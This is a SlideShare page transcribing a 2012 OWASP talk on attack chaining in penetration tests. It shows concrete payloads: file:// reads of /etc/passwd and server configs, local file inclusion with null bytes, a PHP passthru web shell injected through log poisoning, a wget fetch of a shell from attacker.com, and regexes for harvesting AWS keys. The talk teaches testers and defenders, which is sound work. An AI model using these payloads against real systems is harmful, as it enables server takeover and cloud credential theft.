Attack Chaining: Advanced Maneuvers for Hack Fu

  • 3,096 views
Uploaded on

Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a …

Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.

More in: Technology , Design
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
  • Free Download : http://gg.gg/114bb
    Are you sure you want to
    Your message goes here
No Downloads

Views

Total Views
3,096
On Slideshare
0
From Embeds
0
Number of Embeds
2

Actions

Shares
Downloads
88
Comments
1
Likes
3

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Attack ChainingAdvanced Maneuvers for Hack FuOWASP ATL31 May 2012
  • 2. About Us WHO ARE THES DUDES? •  Rob •  Oscar Sr. Security Associate Security Associate @ Stach & Liu @ Stach & Liu 2  
  • 3. Penetration Test vs.Vulnerability Assessment 3  
  • 4. vs. 4  
  • 5. Simulate a real worldattack against atarget network orapplication. - EVERYBODY 5  
  • 6. It answers thequestion, “couldsomeone break in?” 6  
  • 7. Penetration Testing Exploit & Penetrate InformationGathering 2 3 Escalate Privileges 1 Maintain 4a 4b Access Deny Access
  • 8. Pen Testing Scenario •  Web application penetration test •  Cloud-based infrastructure hosts multiple sites •  Out-sourced PHP development to many contractors •  Determine attackers ability to compromise PII or infrastructure 8  
  • 9. Step 1 – Explore 9  
  • 10. Step 2 – Read Code http://vuln.com/dir/share.js ... AJAX.Call({ method:’POST’, url:’include/s_proxy.php’ ... 10  
  • 11. Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php? redirect_url=http://www.google.com 11  
  • 12. Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php? redirect_url=file:///etc/passwd 12  
  • 13. Attack Chaining – Maneuver 1 13  
  • 14. Attack Chaining – Maneuver 1 14  
  • 15. Step 5 – Gather More Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/httpd.conf 15  
  • 16. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 16  
  • 17. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf <VirtualHost *> ServerName vuln.com  DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log </VirtualHost> 17  
  • 18. Step 7 – Back to DirBuster 18  
  • 19. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php 19  
  • 20. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php<?phprequire_once(includes/config.php);$module = !empty($_REQUEST[module]) ? $_REQUEST[module] :$config[module];$action = !empty($_REQUEST[action]) ? $_REQUEST[action] :$config[action];$currentModuleFile = modules/.$module./.$action..php;include($currentModuleFile)exit;?> 20  
  • 21. Attack Chaining – Maneuver 2 21  
  • 22. Attack Chaining – Maneuver 2 22  
  • 23. Step 9 – Null Byte Injection http://vuln.com/dir/include/controller.php ?module=../../../../../../etc/passwd%00 23  
  • 24. Step 8 – Review Codehttp://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php<?phprequire_once(includes/config.php);$module = !empty($_REQUEST[module]) ? $_REQUEST[module] :$config[module];$action = !empty($_REQUEST[action]) ? $_REQUEST[action] :$config[action];$currentModuleFile = modules/.$module./.$action..php;include($currentModuleFile)exit;?> 24  
  • 25. Step 10 – Review Gathered Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 25  
  • 26. Step 10 – Back to Virtual Conf http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf <VirtualHost *> ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log </VirtualHost> 26  
  • 27. Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 27  
  • 28. Step 12 – Poison Logs 28  
  • 29. Step 12 – Poison Logs 29  
  • 30. Step 12 – Poison Logs <? echo <pre>; passthru($_GET[cmd]); echo </pre>; ?> 30  
  • 31. Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 31  
  • 32. Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: <? echo <pre>;passthru( $_GET[cmd]);echo <pre>; ?> 32  
  • 33. Step 14 – Execute Code http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00&cmd=ls; /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 33  
  • 34. Step 14 – Execute Code <? echo <pre>; passthru(ls); echo </pre>; ?> /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 34  
  • 35. Attack Chaining – Maneuver 3 35  
  • 36. Attack Chaining – Maneuver 3 36  
  • 37. Step 15 – Upload Shell http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00&cmd=wget%20http:// attacker.com/gny.php;   37  
  • 38. Step 16 – Enjoy! 38  
  • 39. Step 17 – I  want  more!ec2[^d]["][A-Z0-9]{20}["]ec2.*["][A-Z0-9]{20}["] ["][A-Za-z0-9+/]{40}["]ec2.*["][A-Z0-9]{20}["]ec2(D)*["][A-Z0-9]{20}["]amazon.*["][A-Z0-9]{20}["](amazon|ec2).*["][A-Z0-9]{20}["]amazon(D)*["][A-Z0-9]{20}["]access secret ["][A-Z0-9]{20}["] [A-Za-z0-9+/]{40}amazon.*["][A-Z0-9]{20}["].*["][A-Za-z0-9+/]{40}["]aws.*["][A-Z0-9]{20}["] ["][A-Za-z0-9+/]{40}["]amazon.*["][A-Z0-9]{20}["] ["][A-Za-z0-9+/]{40}["]secret.*["][A-Za-z0-9+/]{40}["]["][A-Za-z0-9+/]{40}["].*amazon 39  
  • 40. Step 18 – Amazon  AWS  Regex$this-­‐>amazonService  =  new  Zend_Service_Amazon(DB3BAD768F2F11C7628,    $aws_key  =  8AFB5AF55D1E6620EE1;    define(AMAZON_KEY,  372B8E408D1484C538F);    if  (!defined(awsAccessKey))  define(awsAccessKey,  9F6EB7471C926194884);    //if  (!defined(awsAccessKey))  define(awsAccessKey,  4CAD89B86344CD8C26C);    define(AMAZON_AES_ACCESS_KEY_ID,  95C95B8DC84AA24C0EC);   40  
  • 41. Step 19 – AWS  Takeover 41  
  • 42. Step 20 – Make  It  Your  Own 42  
  • 43. Cost of Amazon Cloud Compromise CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker launches 100 Extra Large Clusters$1,049,000 43  
  • 44. Take Them Off The Web CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker shuts down and deletes all servers and backups permanentlyPRICELESS 44  
  • 45. Attack Chaining – Hack Fu 45  
  • 46. Attack Chaining – Hack Fu 46  
  • 47. Why Is This Happening? 1.  Local File Include 4.  Insecure Credential •  File Read Only Storage •  Code Execution 5.  Overly Permissive 2.  Null Byte Injection Amazon AWS Keys 3.  Log Poisoning 6.  Sensitive Information Disclosure 47  
  • 48. Web à Mass Malware Deployment 48  
  • 49. Web à Data Center Compromise 49  
  • 50. Web à Internal Network Compromise 50  
  • 51. Internal Assessmentà SSN & Bank #’s 51  
  • 52. Infrastructure Review 52  
  • 53. Step 1 – Target Wireless 53  
  • 54. Step 1 – Target Wireless 54  
  • 55. Step 2 – Port Scan 55  
  • 56. Step 3 – Test Default Creds 56  
  • 57. Infrastructure Apocalypse 57  
  • 58. Step 4 – Control AP 58  
  • 59. Step 5 – Read All E-mail 59  
  • 60. Step 6 – Listen To VOIP 60  
  • 61. Step 7 – Open All Doors 61  
  • 62. Step 7 – Open All Doors 62  
  • 63. 63  
  • 64. Step 7 – Server Room Door 64  
  • 65. Is This Real Life? 1.  Insecure Wireless 4.  Weak Passwords Encryption 5.  Sensitive Information 2.  Improper Network Disclosure Segmentation 3.  Insecure Default Configuration 65  
  • 66. Protection – How? 1.  People 2.  Policy 3.  Processes 4.  Strategic / Tactical Security 5.  Defense In-Depth 66  
  • 67. Defense In-Depth I S P R O T E C T I O N A G A I N S T. . . 67  
  • 68. How Do You Get Better? 68  
  • 69. Synthesis and Patterns CAN BE BOTH GOOD AND BAD 69  
  • 70. Attack Visualization LIKE BOBBY FISCHER 70  
  • 71. Thank You 72